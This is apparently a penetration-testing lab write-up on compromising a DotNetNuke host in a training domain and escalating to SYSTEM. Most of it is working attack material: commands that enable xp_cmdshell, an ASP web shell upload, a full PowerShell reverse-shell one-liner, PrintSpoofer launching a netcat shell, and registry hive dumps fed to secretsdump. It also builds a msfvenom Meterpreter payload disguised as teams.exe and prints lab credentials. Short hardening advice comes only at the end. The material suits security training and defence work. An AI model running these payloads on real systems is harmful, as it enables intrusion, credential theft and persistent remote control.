Exploitation & Privilege Escalation transforms credential discovery into SYSTEM-level access on internal hosts. Leverage DotNetNuke (DNN) administrative access, enable xp_cmdshell, exploit SeImpersonate privileges with PrintSpoofer, and establish multiple persistence methods for reliable internal network control.
# Credential validation from NFS discovery
Administrator:D0tn31Nuk3R0ck$$@123
# Source: /DEV01/DNN/web.config
# Login verification
http://172.16.8.20/Login?returnurl=%2fadmin
# Result: SuperUser administrator account access
# Findings to document:
1. Insecure File Shares (NFS anonymous access)
2. Sensitive Data on File Shares (credentials in config)-- Enable xp_cmdshell for command execution
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
-- Test command execution
xp_cmdshell 'whoami'
-- Output: nt service\mssql$sqlexpress# DNN file upload configuration:
1. Settings → Security → More → More Security Settings
2. Allowable File Extensions: asp,aspx,exe,SAVE
3. Save configuration
# Upload capabilities enabled:
- ASP web shells (.asp, .aspx)
- Executable files (.exe)
- Registry dumps (.SAVE)# ASP web shell upload
1. Download newcmdasp.asp from GitHub
2. Upload via DNN File Management (/admin/file-management)
3. Access web shell via uploaded file URL
4. Test command execution: whoami
# Result: iis apppool\dotnetnukeapppool
# Privileges: SeImpersonate (exploitable)# Reverse shell payload (from web shell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('172.16.8.120',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Listener setup (on dmz01):
nc -nvlp 9999
# Result: Interactive PowerShell session# Prerequisites:
1. Upload nc.exe and PrintSpoofer64.exe via DNN
2. Verify SeImpersonate privilege
3. Setup listener on dmz01
# PrintSpoofer execution:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"
# Expected privileges:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
# Result: NT AUTHORITY\SYSTEM shell# Registry hive dumping (as SYSTEM):
reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SAM SAM.SAVE
# Download via DNN file manager:
1. Navigate to /admin/file-management
2. Download SYSTEM.SAVE, SECURITY.SAVE, SAM.SAVE
3. Transfer to attack host for analysis# Credential extraction
secretsdump.py LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE
# Local account hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
# Domain cached credentials:
INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#[HASH]
# LSA Secrets:
DefaultPassword: Gr8hambino!
# Associated user: hporter (domain account)# First domain credential pair discovered:
hporter:Gr8hambino!
# Source: LSA Secrets DefaultPassword
# Validation from SYSTEM shell:
net user hporter /dom
# Output: Domain Users group membership confirmed
# Password last set: 6/1/2022
# Account active: Yes# Scenario: Direct reverse shell from DEV01 to attack host
# 1. Generate payload (target: dmz01 IP)
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.8.120 -f exe -o teams.exe LPORT=443
# 2. Setup multi/handler (attack host)
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 7000
run
# 3. SSH reverse port forwarding
ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@TARGET_IP -vN
# 4. Execute payload on DEV01
teams.exe
# Result: Meterpreter session through port forwarding# GatewayPorts configuration (if needed):
# Edit /etc/ssh/sshd_config on dmz01:
GatewayPorts yes # Change from 'no' to 'yes'
# Reload SSH service:
service sshd reload
# Security consideration:
- Client approval required for config changes
- Document all modifications
- Revert changes post-assessment
- Note security implications in report# Method 1: SQL Console → xp_cmdshell
DNN Admin → Settings → SQL Console → Command execution
# Method 2: File Upload → ASP Web Shell
DNN Admin → File Extensions → Upload newcmdasp.asp → RCE
# Method 3: Direct Credential Usage
hporter:Gr8hambino! → SMB/RDP/WinRM access
# Method 4: Pass-the-Hash
Administrator NT hash → Direct authentication# Local administrator access:
- SAM database hash extraction
- Pass-the-hash authentication capability
- Local admin account compromise
# Domain account access:
- hporter:Gr8hambino! (cleartext)
- Domain Users group membership
- Internal AD enumeration capability
# System-level access:
- NT AUTHORITY\SYSTEM shell
- Registry access and modification
- Service manipulation capabilities# Domain information:
Domain: INLANEFREIGHT.LOCAL
Domain Controller: 172.16.8.3
Domain SID: S-1-5-21-2814148634-3729814499-1637837074
# Compromised accounts:
hporter (Domain Users) - cleartext password
Administrator (DEV01 local) - NT hash
mpalledorous (DEV01 local) - NT hash
# Network positioning:
- SYSTEM access on DEV01 (172.16.8.20)
- Root access on dmz01 (172.16.8.120)
- Direct connectivity to Domain Controller# AD enumeration priorities:
1. BloodHound data collection
2. Domain user enumeration
3. Service account discovery
4. Group membership analysis
5. Trust relationship mapping
# Lateral movement opportunities:
- Kerberoasting attacks
- ASREPRoasting attempts
- Password spraying campaigns
- SMB share enumeration
- Privilege escalation hunting# Lab 1: SAM Database Extraction
1. DNN admin access → Administrator:D0tn31Nuk3R0ck$$@123
2. File extension modification → asp,aspx,exe,SAVE
3. Web shell upload → newcmdasp.asp deployment
4. PrintSpoofer exploitation → SYSTEM privilege escalation
5. Registry hive dumping → SAM, SYSTEM, SECURITY
6. Secretsdump analysis → Administrator NT hash extraction
# Lab 2: Administrator Desktop Flag
1. SYSTEM shell establishment → PrintSpoofer execution
2. Privilege verification → NT AUTHORITY\SYSTEM
3. Flag retrieval → C:\Users\Administrator\Desktop\flag.txt# Technical skills:
- DNN administrative functionality abuse
- SQL Server xp_cmdshell exploitation
- SeImpersonate privilege escalation
- Windows registry credential extraction
# Professional methodology:
- Multiple attack vector development
- Persistence mechanism establishment
- Evidence collection standards
- Systematic privilege escalation
# Real-world scenarios:
- Development environment exploitation
- Configuration file credential mining
- Built-in functionality abuse
- Domain preparation techniques# DNN hardening:
- Disable SQL Console access
- Restrict file upload extensions
- Implement admin approval workflows
- Regular credential rotation
# SQL Server security:
- Disable xp_cmdshell by default
- Implement least privilege access
- Monitor database admin activities
- Use dedicated service accounts
# File share security:
- Disable anonymous NFS access
- Implement proper access controls
- Encrypt sensitive configuration files
- Regular share permission audits